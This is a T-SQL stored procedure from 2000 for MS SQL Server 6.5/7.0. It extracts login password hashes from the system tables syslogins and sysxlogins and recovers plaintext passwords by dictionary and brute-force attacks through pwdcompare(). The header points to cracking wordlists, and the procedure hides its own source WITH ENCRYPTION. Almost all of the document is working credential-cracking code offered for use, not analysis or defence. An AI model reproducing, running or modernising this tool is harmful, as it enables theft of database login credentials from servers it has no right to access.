------------------------------------------------------------------------------------
IF object_id('dbo.sp_get_passwords') IS NOT NULL
	DROP PROC dbo.sp_get_passwords
GO
------------------------------------------------------------------------------------

/***************************************************************************
 * sp_get_passwords		(c) Max Uzunov  2000/02/08                 *
 *                                                                         *
 * This sp can properly work ONLY at MS SQL 6.5/7.0                        *
 * This procedure "calculate" users passwords                              *
 * FROM system TABLE: [syslogins]/[sysxlogins] for MS SQL 6.5/7.0          *
 *                                                                         *
 * A lot of wordlists for dictionary attack you may found at:              *
 *	http://packetstorm.securify.com/Crackers/wordlists/                *
 *	ftp://ftp.cso.uiuc.edu/pub/security/wordlists                      *
 *                                                                         *
 *                                                                         *
 * Uses 'pwdcompare()' built-in function to find                           *
 * a plaintext passwords.                                                  *
 *                                                                         *
 * Usage:                                                                  *
 * 1. CREATE TABLE ##t(name varchar(30), password varchar(30))             *
 * 2. EXEC	sp_get_passwords                                           *
 *		 @alphabet	= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'             *
 *		,@rslt_table	= '##t'                                    *
 *		,@save_table	= 'SavCombinations'                        *
 *		,@save_col_name	= 'Combination'                            *
 *		,@start		= 'AAAAAA'                                 *
 *		,@stop		= 'OZZZZZZ'                                *
 *	--	,@max_len	= 7                                        *
 *		,@delta		= 10000                                    *
 *	--	,@dictionary	= 'dict'	--"dictionary" TABLE name  *
 *	--	,@col_name	= 'word'	--column name              *
 *                                                                         *
****************************************************************************/


------------------------------------------------------------------------------------
CREATE PROC sp_get_passwords
	 @alphabet	varchar(255)	=	'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
	,@pwd_table	varchar(255)	=	NULL	-- Source passwords table name; Structure: (name varchar(30), password varchar(30), xstatus int NULL/*This column required ONLY MS SQl 7.0*/)
	,@save_table	varchar(255)	=	NULL	-- Save table name (to save last used combination)
	,@save_col_name	varchar(255)	=	NULL	-- column name in "Save" table
	,@rslt_table	varchar(255)	=	'##t'	-- Results table name; Structure: (name varchar(50), password varchar(50))
	,@start		varchar(255)	=	NULL	-- Start combination
	,@stop		varchar(255)	=	NULL	-- Stop combination
	,@min_len	int		=	1	-- MIN password length
	,@max_len	int		=	8	-- MAX password length
	,@delta		int		=	10000	-- iteration counter
	,@work_time	int		=	60000	-- MAX work time in minutes
	,@dictionary	varchar(255)	=	NULL	-- "dictionary" table name for dictionary attack
	,@col_name	varchar(255)	=	NULL	-- column name in "dictionary" table
WITH ENCRYPTION
AS
SET NOCOUNT ON
SET ROWCOUNT 0
------------------------------------------------------------------------------------
DECLARE
	@s		varchar(255)	,	@char		varchar(3)	,
	@first_char	varchar(255)	,	@last_char	varchar(255)	,
	@sql1		varchar(255)	,	@sql2		varchar(255)	,
	@sql3		varchar(255)	,	@sql_up_stat	varchar(255)	,
	@i		int		,	@errmsg		varchar(255)	,
	@alph_len	int		,	@cur_len	int		,
	@s_ptr		int		,	@a_ptr		int		,
	@cnt		int		,	@flg		int		,
	@sql_ver	int		,	@prev_time	datetime	,
	@finish_time	datetime
	
SELECT	 @alph_len	= len(@alphabet)
	,@cnt		= 0
	,@flg		= 1
	,@sql_up_stat	= NULL
	,@first_char	= substring(@alphabet,1,1)
	,@last_char	= right(@alphabet,1)
	,@finish_time	= dateadd(minute,@work_time,getdate())
	,@sql_ver	= CASE
				WHEN patindex('%Microsoft%SQL%Server%6.50%',@@version) > 0	THEN 6
				WHEN patindex('%Microsoft%SQL%Server%7.00%',@@version) > 0	THEN 7
				ELSE 0
			  END

/* Check MS SQL version... */
IF ( @sql_ver NOT IN (6,7) )	BEGIN
	SELECT @errmsg = 'This procedure can work properly ONLY with MS SQL v 6.5/7.0'
	GOTO ERR_EXIT
END


/* Setup start/END string combination for brute force attack... */

IF ( @start IS NOT NULL ) BEGIN
	IF ( @save_table IS NOT NULL	AND	@save_col_name IS NOT NULL ) BEGIN
        	EXEC ( 'UPDATE ' + @save_table + ' set ' + @save_col_name + ' = "' + @start + '"' )
	        IF ( @@ERROR <> 0 ) BEGIN
			SELECT @errmsg = 'Error initializing TABLE: ' + @save_table
			GOTO ERR_EXIT
	        END
	END
END ELSE
	SELECT	@start	= ISNULL(replicate(@first_char,@min_len),@first_char)

/* Read saved combination FROM "SaveStatus" table... */
IF ( @save_table IS NOT NULL	AND	@save_col_name IS NOT NULL )	BEGIN

        EXEC ( 'IF ( (SELECT count(*) FROM ' + @save_table + '(NOLOCK))=0 ) INSERT INTO ' + @save_table + '(' + @save_col_name + ') values("' + @start + '")' )
        IF ( @@ERROR <> 0 ) BEGIN
		SELECT @errmsg = 'Error initializing TABLE: ' + @save_table
		GOTO ERR_EXIT
        END

        CREATE TABLE #sav(word varchar(255))

	INSERT INTO #sav(word)
	EXEC ( 'SELECT ' + @save_col_name + ' FROM ' + @save_table + '(NOLOCK)')
	IF ( @@ERROR <> 0 ) BEGIN
		SELECT @errmsg = 'Error reading start combinations FROM "SaveStatus" TABLE: ' + @save_table
		GOTO ERR_EXIT
	END

	IF ( (SELECT count(*) FROM #sav(NOLOCK)) = 1 )	BEGIN
		SELECT @start = word FROM #sav(NOLOCK)
		SELECT @sql_up_stat = 'UPDATE ' + @save_table + ' SET ' + @save_col_name + ' = "'
	END ELSE BEGIN
		SELECT @errmsg = 'Error: Table "' + @save_table + '" MUST contain EXACTLY 1 (ONE) record !!!'
		GOTO ERR_EXIT
	END

        DROP TABLE #sav
END

IF ( @stop IS NULL )
	SELECT  @stop	= replicate(@last_char,@max_len)

SELECT	 @s		=  @start
	,@cur_len	=  len(@start)


CREATE TABLE #s(name varchar(30), password varbinary(255), xstat int NULL)
IF @@ERROR <> 0 BEGIN
  SELECT @errmsg = 'Error executing: "CREATE TABLE #s(name varchar(30), password varbinary(255), xstat int NULL)"! Aborting...'
  GOTO ERR_EXIT
END


-- Processing version difference...
IF (@sql_ver = 6) BEGIN		-- MS SQL 6.5

   IF @pwd_table IS NULL
   	SELECT @pwd_table = 'master..syslogins'

   EXEC('INSERT INTO #s(name,password) SELECT name, convert(varbinary(255),password) FROM ' + @pwd_table + '(NOLOCK) where password IS NOT NULL')
   IF @@ERROR <> 0 BEGIN
     SELECT @errmsg = 'Error inserting rows INTO temporary TABLE! Aborting...'
     GOTO ERR_EXIT
   END

   SELECT  @sql1 = 'INSERT INTO ' + @rslt_table + ' SELECT name, ' + CHAR(39)
          ,@sql2 = CHAR(39) + ' FROM #s(NOLOCK) where pwdcompare(' + CHAR(39)
          ,@sql3 = CHAR(39) + ',password) = 1'

END ELSE BEGIN			-- MS SQL 7.0

   IF @pwd_table IS NULL
   	SELECT @pwd_table = 'master..sysxlogins'

   EXEC('INSERT INTO #s SELECT name,convert(varbinary(255),password),(CASE WHEN xstatus&2048=2048 THEN 1 ELSE 0 END) FROM ' + @pwd_table + '(NOLOCK) where srvid IS NULL AND password IS NOT NULL')
   IF @@ERROR <> 0 BEGIN
     SELECT @errmsg = 'Error inserting rows INTO temporary TABLE! Aborting...'
     GOTO ERR_EXIT
   END

   SELECT  @sql1 = 'INSERT INTO ' + @rslt_table + ' SELECT name, ' + CHAR(39)
          ,@sql2 = CHAR(39) + ' FROM #s(NOLOCK) where pwdcompare(' + CHAR(39)
          ,@sql3 = CHAR(39) + ',password,xstat) = 1'
END


/* Perform dictionary attack... */
IF ( @dictionary  IS NOT NULL	AND   @col_name IS NOT NULL )	BEGIN
  PRINT 'Performing dictionary attack...'
  DECLARE  @s1	varchar(255)

  SELECT @s1= 'SELECT rows AS "Total words in dictionary" FROM ' + case when substring(ltrim(@dictionary),1,1) = '#' THEN 'tempdb..sysindexes' ELSE 'sysindexes' END +
              ' where id = object_id("' + case when substring(@dictionary,1,1) = '#' THEN 'tempdb..' + RTrim(@dictionary) ELSE RTrim(@dictionary) END +
              '") AND indid < 2'
  EXEC ( @s1 )
  IF (@@ERROR <> 0) BEGIN
     SELECT @errmsg = 'Error calculating number of words in "dictionary" TABLE: ' + @dictionary + ' !  Abortion...'
     GOTO ERR_EXIT
  END

  SELECT @s1 = 'INSERT INTO ' + @rslt_table + ' SELECT s.name, d.' + rtrim(@col_name) +
               ' FROM #s s(NOLOCK) join ' + rtrim(@dictionary) + ' d(NOLOCK)' +
               ' ON ( pwdcompare(d.' + rtrim(@col_name) + ',s.password'
  IF (@sql_ver = 7 )
     SELECT @s1 = @s1 + ',xstat'
  SELECT @s1 = @s1 + ') = 1 )'

  EXEC ( @s1 )
  IF (@@ERROR <> 0) BEGIN
     SELECT @errmsg = 'Error performing dictionary attack! Abortion...'
     GOTO ERR_EXIT
  END

  PRINT 'Dictionary attack - done!  See results below.'

  EXEC ( 'SELECT distinct * FROM ' + @rslt_table + '(NOLOCK) IF @@ROWCOUNT > 0 DELETE FROM #s where exists(SELECT * FROM ' + @rslt_table + '(NOLOCK) where name = #s.name)' )
END




/* Perform brute force attack... */
PRINT 'Performing brute force attack...'
SELECT	 @i		=  charindex(substring(@s,@cur_len,1),@alphabet)
	,@prev_time	=  getdate()

WHILE ( 1 = 1 ) BEGIN
  IF ( @flg = 0 )
     SELECT  @s = stuff(@s,@cur_len,1,substring(@alphabet,@i,1))

  IF ( @s = @stop  /*OR  @cur_len > @max_len*/ )
    BREAK

/* Insert founded passwords INTO temporary TABLE @rslt_table */
  EXEC ( @sql1 + @s + @sql2 + @s + @sql3 )

  IF (@i = @alph_len)	BEGIN
     IF ( @s = replicate(@last_char,@cur_len) )
         SELECT @s = replicate(@first_char,@cur_len+1), @cur_len = @cur_len + 1
     ELSE BEGIN
        SELECT @s_ptr = @cur_len - patindex('%[^'+ @last_char +']%',reverse(@s)) + 1
        IF ( @s_ptr <= @cur_len) BEGIN
           SELECT @a_ptr = charindex(substring(@s,@s_ptr,1),@alphabet)
   
           IF (@a_ptr = @alph_len)
              SELECT  @char = @first_char
           ELSE
              SELECT  @char = substring(@alphabet,@a_ptr+1,1)
   
           SELECT @s = stuff(@s,@s_ptr,@cur_len+1,@char + replicate(@first_char,@cur_len-@s_ptr))
        END
     END
     SELECT @flg = 1
  END ELSE 
     SELECT @flg = 0

  SELECT  @i = CASE WHEN @i >= @alph_len THEN 1 ELSE @i + 1 END,
          @cnt = @cnt + 1

  IF ( @cnt % @delta = 0 ) BEGIN
     SELECT
        @cnt AS 'Counter',
        @delta * 1000 / datediff(millisecond,@prev_time, getdate()) AS 'Tries/sec',
        @s AS 'Current combination...'

     EXEC ( 'IF (SELECT count(*) FROM ' + @rslt_table + '(NOLOCK))>0 BEGIN DELETE FROM #s where exists(SELECT * FROM ' + @rslt_table + '(NOLOCK) where name=#s.name) SELECT count(distinct name) AS "Total found" FROM ' + @rslt_table + '(NOLOCK) END' )

     IF ( @sql_up_stat IS NOT NULL )
     	EXEC( @sql_up_stat + @s + '"' )

     SELECT @prev_time = getdate()

     IF ( @prev_time >= @finish_time OR (SELECT rows FROM tempdb..sysindexes where id = object_id('tempdb..#s') AND indid<2)=0 )
        BREAK
  END
END

IF ( @sql_up_stat IS NOT NULL )
	EXEC( @sql_up_stat + @s + '"' )

PRINT ''
PRINT 'Done !!!'
SELECT 'Total performed ' + ltrim(str(@cnt)) + ' iterations...' AS 'Info', @s AS 'Last combinations...'

IF ( (SELECT count(*) FROM #s(NOLOCK))=0 )
   PRINT 'Found all passwords !!!'

EXEC ( 'IF (SELECT count(*) FROM ' + @rslt_table + '(NOLOCK)) > 0 SELECT distinct * FROM ' + @rslt_table + '(NOLOCK) order by name' )

--------------------------------------------------------------
NORM_EXIT:
	IF object_id('tempdb..#s') IS NOT NULL
		DROP TABLE #s
	RETURN 0

ERR_EXIT:
	RAISERROR(@errmsg,1,1)
	IF object_id('tempdb..#s') IS NOT NULL
		DROP TABLE #s
	RETURN 1
GO
------------------------------------------------------------------------------------
